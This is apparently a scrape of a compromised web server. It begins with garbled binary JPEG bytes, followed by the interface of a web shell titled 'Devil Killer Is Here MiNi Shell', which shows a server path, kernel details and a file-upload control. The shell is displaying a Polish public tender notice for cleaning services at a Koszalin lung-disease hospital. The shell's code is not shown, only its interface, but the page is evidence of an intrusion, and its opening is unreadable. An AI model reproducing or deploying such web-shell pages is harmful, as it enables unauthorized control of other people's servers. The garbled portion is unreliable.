JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240130/0007689501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe utrzymanie czystości w pomieszczeniach biurowych, socjalnych, poradniach lekarskich oraz pracowniach Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalistyczny Zespół Gruźlicy i Chorób Płuc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000290759</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niepodległości 44-48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-252</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szgichp.med.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">szgichp.med.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe utrzymanie czystości w pomieszczeniach biurowych, socjalnych, poradniach lekarskich oraz pracowniach Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-42af4c94-bf44-11ee-9897-f6855eb846c0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00076895</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-42af4c94-bf44-11ee-9897-f6855eb846c0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl<br/>(korzystanie z Platformy e-Zamówienia jest bezpłatne) oraz poczty elektronicznej Zamawiającego przetargi@szgichp.med.pl z<br/>zastrzeżeniem, iż oferta musi zostać złożona przy użyciu Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum pomocy”,<br/>2) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani<br/>logowania,<br/>3) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie,<br/>4) Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”,<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza),<br/>6) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania<br/>z usług Platformy oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia,<br/>7) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy użytkownicy mogą skorzystać ze<br/>wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony<br/>na stronie internetowej https://ezamowienia.gov.pl/pl w zakładce „Zgłoś problem”,<br/>8) Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi<br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać Zamawiający od Wykonawcy (Dz.U. z 2020 r., poz. 2415),<br/>9) Sposób złożenia oferty został szczegółowo opisany Rozdziale XI SWZ pkt.3)<br/>10) Sposób składania oferty został opisany w Instrukcji interaktywnej „Oferty, wnioski i prace konkursowe” dostępnej na Platformie e-<br/>Zamówienia w zakładce „Centrum pomocy”.<br/>11) Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>12) Ofertę składa się w formie elektronicznej tj. opatrzoną kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym (e-dowód).<br/>13) Sposób porozumiewania się Zamawiającego z Wykonawcami w zakresie skutecznego złożenia zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji w niniejszym<br/>postępowaniu (NIE DOTYCZY SKŁADANIA OFERT):<br/>1) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się droga<br/>elektroniczną za pośrednictwem:<br/>a) „Formularzy do komunikacji” dostępnych na Platformie e-Zamówienia https://ezamowienia.gov.pl/pl, w zakładce „Formularze”<br/>lub<br/>b) poczty elektronicznej, na adres e-mail: przetargi@szgichp.med.pl<br/>2) Wykonawca może zwrócić się do Zamawiającego o wyjaśnienia dotyczące treści Specyfikacji Warunków Zamówienia, kierując<br/>swoje zapytania w postaci elektronicznej na adres e-mail: przetargi@szgichp.med.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące RODO zawiera Załącznik nr XXIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2P/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Kompleksowe utrzymanie czystości w pomieszczeniach biurowych, socjalnych, poradniach<br/>lekarskich oraz pracowniach Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie polegająca na utrzymanie<br/>czystości wewnątrz budynku w następujących pomieszczeniach: biurowych, socjalnych, poradniach lekarskich, pracowniach<br/>specjalistycznych, ciągach komunikacyjnych, klatkach schodowych oraz w łączniku pomiędzy budynkiem głównym szpitala<br/>a Centrum Opieki Długoterminowej (COD) oraz w klatce schodowej w budynku COD wraz z zabezpieczeniem niezbędnych<br/>środków czystości tj. mydła, papieru toaletowego, ręczników jednorazowych w ww. pomieszczeniach w zakresie określonym<br/>w SWZ .<br/>Kod Klasyfikacji Wspólnego Słownika Zamówień (CPV):<br/>90600000-3 Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane<br/>Łączna ilość miesięczna m2 do sprzątania wynosi: 1 669,25 m2,<br/>w tym pomieszczenia sprzątane: 1 raz dziennie przez 5 dni w tygodniu: 1 504,33 m2,<br/>1 raz w tygodniu: 164,92 m2<br/>2.Sposób realizacji przedmiotu zamówienia (częstotliwość wykonywanych czynności należy wykonać zgodnie z planem<br/>higieny stanowiącym załącznik nr 2 do wzoru umowy):<br/>1) Zabezpieczenie niezbędnych środków czystości tj. mydła, papieru toaletowego, ręczników jednorazowych w sprzątanych<br/>pomieszczeniach,<br/>2) Odkurzanie wykładzin i dywanów,<br/>3) pranie wykładzin i dywanów,<br/>4) mycie podłóg, dezynfekcja podłóg, szorowanie i konserwacja podłóg,<br/>5) wycieranie kurzu metodą przecierania wyposażenia pomieszczeń, w tym<br/>z parapetów i grzejników, szafek, blatów, biurek, (o ile nie leży na nich dokumentacja), szaf, regałów, półek, ram, obrazów i<br/>innych elementów dekoracyjnych itp.,<br/>6) czyszczenie oznakowań, tablic i napisów,<br/>7) mycie i dezynfekcja grzejników, koszy na śmieci, utrzymanie w czystości luster, stolarki (w tym drzwi z szybami i klamek,<br/>codzienne mycie i dezynfekcja muszli i desek ustępowych, spłuczek, pisuarów, umywalek i baterii, glazury,), dozowników na<br/>mydło i preparatów dezynfekcyjny do rąk oraz podajników do papieru jednorazowego użytku,<br/>8) opróżnianie koszy na odpady zgodnie z instrukcją postępowania<br/>z odpadami szpitalnymi oraz wymiana worków jednorazowych z tworzywa sztucznego,<br/>9) zbiórka i składowanie surowców wtórnych – postepowanie zgodnie z instrukcją postepowania z odpadami<br/>obowiązującymi w Specjalistycznym Zespole Gruźlicy Chorób<br/>i Płuc,<br/>10) mycie okien i ram okiennych oraz parapetów zewnętrznych).<br/>11) mycie kloszy oświetleniowych,<br/>12) codzienne przekazywanie mopów i ścierek itp. do prania (zakaz używania wilgotnych, brzydko pachnących mopów z<br/>poprzedniego dnia oraz zakaz prania ręcznego mopów<br/>suszenia w pomieszczeniach pracowników firmy sprzątającej,<br/>13) zalewanie kratek ściekowych środkiem dezynfekcyjnym o odpowiednim stężeniu,<br/>14) stosowanie środków dezynfekujących spełniających następujące wymogi wynikających ze wskazań specjalisty ds.<br/>Pielęgniarstwa epidemiologicznego zatrudnionego u Zamawiającego,<br/>15) sukcesywne uzupełnianie mydła, papieru toaletowego, ręczników jednorazowych<br/>w poszczególnych pomieszczeniach.<br/>3. WYkonawca do wykonywania przedmiotowej usługi będzie używał:<br/>1) mopów z oznaczeniem kolorystycznym, uwzględniającym podział szpitala na strefy sanitarne w ilości co najmniej 10<br/>sztuk,<br/>2) stelaży do mopów umożliwiające wymianę mopa w systemie bezdotykowym w ilości<br/>co najmniej 3 sztuki;<br/>3) dobrych jakości ściereczek do sprzątania pomieszczeń (kolory ściereczek – 3 kolory wybrane przez Wykonawcę i<br/>uzgodnione z Zamawiającym) lub ścierek jednorazowego użytku;<br/>4) środków ochrony osobistej (rękawice gospodarcze, maseczki, gogle ochronne, jednolite ubrania i obuwie robocze,<br/>identyfikatory);<br/>4. Wykonawca jest zobowiązany posiadać kary charakterystyki substancji niebezpiecznych oraz umieszczać ulotki<br/>producenta stosowanych preparatów w miejscu dostępnym dla personelu sprzątającego;<br/>5. Wykonawca jest zobowiązany przestrzegać instrukcje:<br/>1) podziału sprzątanych powierzchnia na strefy sanitarne, w tym kodu kolorów wykorzystywanego sprzętu,<br/>2) postępowania ze sprzętem po zakończonym sprzątaniu (wózki, nakładki, mopy itp.)<br/>3) procedurę przygotowywania roztworów roboczych preparatów dezynfekcyjnych,<br/>4) procedurę postępowania po ekspozycji na krew i inny potencjalnie infekcyjny materiał;<br/>5) procedurę postępowania z rozlaną krwią i innym potencjalnie infekcyjnie materiałem;<br/>6) higienicznego mycia rąk;<br/>7) instrukcji stanowiskowych BHP;<br/>8) ochrony danych osobowych.<br/>6. Wykonawca we własnym zakresie zaopatruje się w worki do śmieci koloru czerwonego, niebieskiego i czarnego. Worki<br/>koloru czerwonego musza być oznaczone w sposób uzgodniony<br/>z Zamawiającym.<br/>7. Warunki realizacji zamówienia i wymogi dotyczące przedmiotu zamówienia oraz środków doboru preparatów<br/>czyszczących zawarte są w projekcie umowy - załącznik nr 3 do SWZ.<br/>8. Zamawiający nie dopuszcza składania ofert częściowych. Podzielenie zamówienia na zadania groziłoby nadmiernymi<br/>trudnościami technicznymi i kosztami wykonania zmówienia, a także potrzebą skoordynowania działań́ rożnych<br/>wykonawców realizujących poszczególne części zamówienia na ograniczonym terenie. Ponadto istniałoby ryzyko<br/>niewykonania części zamówienia. Brak podziału na części nie narusza zasady uczciwej konkurencji, ponieważ nie wpływa<br/>na krąg wykonawców zdolnych do wykonania zamówienia i nie stanowi bariery do ubiegania się o zamówienie małym i<br/>średnim przedsiębiorstwom.<br/>9. Zamawiający dopuszcza możliwość przeprowadzenia wizji lokalnej miejsca wykonywania zamówienia wyborowi<br/>wykonawcy, jako czynności pomocniczej w celu prawidłowego przygotowania oferty, po uprzednim uzgodnieniu z<br/>Zamawiającym terminu i godziny.<br/>Odbycie wizji lokalnej nie stanowi warunku udziału w postępowaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90600000-3 - Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie oceniał oferty według następującego kryterium:<br/>C – cena brutto oferty - waga: 100% (sposób oceny: minimalizacja)<br/>Oferty oceniane będą punktowo.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 109 ust.1 pkt.4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>1.2. spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym -Zamawiający nie wyznacza szczegółowego warunku w tym<br/>zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, - Zamawiający nie wyznacza<br/>szczegółowego warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;,<br/>4) zdolności technicznej lub zawodowej - Wykonawca spełni warunek,<br/>4.1) jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał, a w przypadku świadczeń<br/>okresowych lub ciągłych wykonuje minimum dwie usługi polegające na sprzątaniu powierzchni wewnętrznych w<br/>pomieszczeniach o powierzchni nie mniejszej niż 600 m2 miesięcznie, każda z osobna wykonana lub wykonywana w<br/>ramach jednej umowy trwającej nieprzerwanie przez okres co najmniej 6 miesięcy, z podaniem ich przedmiotu, daty<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie oraz załączeniem<br/>dowodów, czy zostały wykonane lub są wykonywane należycie.<br/>Warunek powyższy zostanie uznany za spełniony, jeżeli wykonane lub wykonywane usługi (każda z osobna) będą trwały<br/>nieprzerwanie przez okres co najmniej 6 miesięcy.<br/>Jedna usługa oznacza usługę wykonaną/wykonywaną na podstawie jednej umowy.<br/>W przypadku usług będących w trakcie wykonywania wymaganie czasu wykonywania danej usługi dotyczy części umowy<br/>już zrealizowanej tj. od dnia rozpoczęcia wykonywania usługi do upływu terminu składania ofert.<br/>4.2) jeżeli wykaże, że dysponuje lub będzie dysponował:<br/>4.2.1) sprawnym systemem automatycznej dystrybucji środków myjących (dostępnym<br/>w okresie obowiązywania realizacji zamówienia), szt.1,<br/>4.2.2) sprawnymi wózkami do sprzątania z systemem kontenerowym ze sprawną wyciskarką mopków (dostępnymi w<br/>okresie obowiązywania realizacji zamówienia), szt.3,<br/>4.2.3) sprawnym odkurzaczem z funkcją prania dywanów, (dostępnym min. 1 raz w roku), szt.1<br/>4.2.4) sprawnym mechanicznie urządzeniem do czyszczenia i konserwacji powierzchni – szorowarką, (dostępnym przy<br/>czynności konserwacji podłóg min. 4 razy w roku), szt.1,<br/>4.2.5) sprawnym mechanicznie bezprzewodowym urządzeniem do mycia podłóg, (dostępnym 5 dni w tygodniu), szt.1,<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przez dwóch lub więcej Wykonawców,<br/>Zamawiający uzna warunek opisany w pkt.:<br/>4.1) za spełniony, jeżeli przynajmniej jeden z Wykonawców spełni wymagany warunek. Nie dopuszcza się łączenia<br/>potencjałów Wykonawców składających ofertę wspólnie,<br/>4.2) za spełniony, jeżeli Wykonawcy wspólnie ubiegający się o zamówienie spełnią wymagany warunek. Dopuszcza się<br/>łączenie potencjałów Wykonawców składających ofertę wspólnie.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy, według wzoru stanowiącego Załącznik nr 3 do SWZ.<br/>3. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z<br/>nim stosunków prawnych.<br/>4. W odniesieniu do warunków dotyczących doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji, których te zdolności są wymagane.<br/>5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>6. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 5, potwierdza, że stosunek łączący Wykonawcę<br/>z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te 